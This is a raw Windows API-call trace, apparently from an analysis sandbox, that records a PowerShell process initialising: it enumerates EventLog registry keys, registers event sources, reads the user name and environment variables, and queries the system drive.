	[0791.528] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.528] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.528] CoTaskMemFree (pv=0x0) 
	[0791.528] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.528] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.528] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.528] CoTaskMemFree (pv=0x0) 
	[0791.528] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0791.528] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x2e1ec0, lpcchName=0x16d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0791.528] CoTaskMemFree (pv=0x2e1ec0) 
	[0791.528] CoTaskMemFree (pv=0x0) 
	[0791.529] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x35c) returned 0x0
	[0791.529] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.529] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x384) returned 0x0
	[0791.529] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.529] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x388) returned 0x0
	[0791.529] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.529] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x38c) returned 0x0
	[0791.530] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.530] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x390) returned 0x0
	[0791.530] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.530] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x394) returned 0x0
	[0791.530] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.530] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x398) returned 0x0
	[0791.530] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.531] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x39c) returned 0x0
	[0791.531] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x0) returned 0x2
	[0791.531] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x3a0) returned 0x0
	[0791.531] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x3a4) returned 0x0
	[0791.531] RegCloseKey (hKey=0x3a4) returned 0x0
	[0792.490] RegCloseKey (hKey=0x380) returned 0x0
	[0792.491] RegCloseKey (hKey=0x3a0) returned 0x0
	[0792.491] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d578 | out: phkResult=0x16d578*=0x3a0) returned 0x0
	[0792.492] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d4ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d4ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d4e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.492] CoTaskMemFree (pv=0x0) 
	[0792.492] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.492] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.492] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.492] CoTaskMemFree (pv=0x0) 
	[0792.492] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.492] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.492] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.492] CoTaskMemFree (pv=0x0) 
	[0792.492] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.492] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.492] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.492] CoTaskMemFree (pv=0x0) 
	[0792.492] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.493] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.493] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.493] CoTaskMemFree (pv=0x0) 
	[0792.493] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.493] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.493] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.493] CoTaskMemFree (pv=0x0) 
	[0792.493] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.493] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.493] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.493] CoTaskMemFree (pv=0x0) 
	[0792.493] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.493] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.493] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.493] CoTaskMemFree (pv=0x0) 
	[0792.493] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.494] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.494] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.494] CoTaskMemFree (pv=0x0) 
	[0792.494] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0792.494] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x2e1ec0, lpcchName=0x16d578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0792.494] CoTaskMemFree (pv=0x2e1ec0) 
	[0792.494] CoTaskMemFree (pv=0x0) 
	[0792.494] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x380) returned 0x0
	[0792.494] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.494] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3a4) returned 0x0
	[0792.495] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.495] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3a8) returned 0x0
	[0792.495] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.495] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3ac) returned 0x0
	[0792.495] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.495] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3b0) returned 0x0
	[0792.495] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.496] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3b4) returned 0x0
	[0792.496] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.496] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3b8) returned 0x0
	[0792.496] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.496] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3bc) returned 0x0
	[0792.496] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x0) returned 0x2
	[0792.497] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3c0) returned 0x0
	[0792.497] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5d8 | out: phkResult=0x16d5d8*=0x3c4) returned 0x0
	[0792.497] RegCloseKey (hKey=0x3c4) returned 0x0
	[0792.497] RegCloseKey (hKey=0x3a0) returned 0x0
	[0792.497] RegCloseKey (hKey=0x3c0) returned 0x0
	[0792.501] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b830008
	[0793.063] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9dd70*="WSMan", lpRawData=0x2e9dae0) returned 1
	[0793.064] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.066] CoTaskMemFree (pv=0x1b742350) 
	[0793.067] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0793.067] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0793.067] CoTaskMemFree (pv=0x1b768af0) 
	[0793.067] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0793.067] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0793.067] CoTaskMemFree (pv=0x2e1ec0) 
	[0793.068] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea32a8*="Alias", lpRawData=0x2ea3038) returned 1
	[0793.068] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.068] CoTaskMemFree (pv=0x1b742350) 
	[0793.069] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0793.069] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0793.069] CoTaskMemFree (pv=0x1b768af0) 
	[0793.069] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0793.069] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0793.070] CoTaskMemFree (pv=0x2e1ec0) 
	[0793.070] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea88a0*="Environment", lpRawData=0x2ea8630) returned 1
	[0793.070] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.070] CoTaskMemFree (pv=0x1b742350) 
	[0793.071] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.071] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0793.071] CoTaskMemFree (pv=0x1b742350) 
	[0793.071] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.071] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0793.071] CoTaskMemFree (pv=0x1b742350) 
	[0793.071] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0793.071] SetErrorMode (uMode=0x1) returned 0x1
	[0793.072] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x16d620 | out: lpFileInformation=0x16d620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.072] SetErrorMode (uMode=0x1) returned 0x1
	[0793.072] GetLogicalDrives () returned 0x4
	[0793.073] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d180, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0793.073] SetErrorMode (uMode=0x1) returned 0x1
	[0793.073] CoTaskMemAlloc (cb=0x68) returned 0x1b737300
	[0793.073] CoTaskMemAlloc (cb=0x68) returned 0x1b7378b0
	[0793.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b737300, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16d5f0, lpMaximumComponentLength=0x16d5ec, lpFileSystemFlags=0x16d5e8, lpFileSystemNameBuffer=0x1b7378b0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16d5f0*=0x9c354b42, lpMaximumComponentLength=0x16d5ec*=0xff, lpFileSystemFlags=0x16d5e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0793.074] CoTaskMemFree (pv=0x1b737300) 
	[0793.074] CoTaskMemFree (pv=0x1b7378b0) 
	[0793.074] SetErrorMode (uMode=0x1) returned 0x1
	[0793.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0793.074] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.074] SetErrorMode (uMode=0x1) returned 0x1
	[0793.075] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d590 | out: lpFileInformation=0x16d590*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.075] SetErrorMode (uMode=0x1) returned 0x1
	[0793.075] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.075] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0793.075] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0793.076] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.076] SetErrorMode (uMode=0x1) returned 0x1
	[0793.076] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.076] SetErrorMode (uMode=0x1) returned 0x1
	[0793.076] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.076] SetErrorMode (uMode=0x1) returned 0x1
	[0793.077] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d3c0 | out: lpFileInformation=0x16d3c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.077] SetErrorMode (uMode=0x1) returned 0x1
	[0793.077] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.077] SetErrorMode (uMode=0x1) returned 0x1
	[0793.077] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d460 | out: lpFileInformation=0x16d460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.077] SetErrorMode (uMode=0x1) returned 0x1
	[0793.077] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0793.078] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0793.078] CoTaskMemFree (pv=0x1b768af0) 
	[0793.078] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0793.078] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0793.078] CoTaskMemFree (pv=0x2e1ec0) 
	[0793.079] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eaf990*="FileSystem", lpRawData=0x2eaf720) returned 1
	[0793.079] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.079] CoTaskMemFree (pv=0x1b742350) 
	[0793.080] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0793.080] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0793.080] CoTaskMemFree (pv=0x1b768af0) 
	[0793.080] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0793.080] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0793.080] CoTaskMemFree (pv=0x2e1ec0) 
	[0793.081] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb51d0*="Function", lpRawData=0x2eb4f60) returned 1
	[0793.081] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0793.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.081] CoTaskMemFree (pv=0x1b742350) 
	[0793.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0793.103] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0793.103] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0794.278] CoTaskMemFree (pv=0x1b768af0) 
	[0794.278] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
